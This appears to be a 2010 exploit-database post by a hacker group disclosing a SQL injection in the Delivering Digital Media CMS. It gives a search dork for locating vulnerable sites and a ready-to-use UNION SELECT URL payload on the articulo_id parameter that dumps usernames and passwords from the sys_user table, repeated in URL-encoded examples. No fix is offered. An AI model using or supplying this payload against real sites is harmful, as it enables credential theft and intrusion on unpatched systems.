Delivering Digital Media CMS SQL Injection Vulnerability

2010-06-03 16:03:13

# Title: Delivering Digital Media CMS SQL Injection Vulnerability
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published:
# Verified:
# Download Exploit Code
# Download N/A


N.A.S.T
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************

[!] Delivering Digital Media CMS SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : [email protected]<mailto:[email protected]> & [email protected]<mailto:[email protected]>

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.delivering.info
[+] script : Delivering Digital Media CMS
[+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"index.php?edicion_id="

**************************************************************************/
[ Vulnerable File ]

http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]

[ Exploit ]

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

[ GReets ]

[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS


EXAMPL:http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.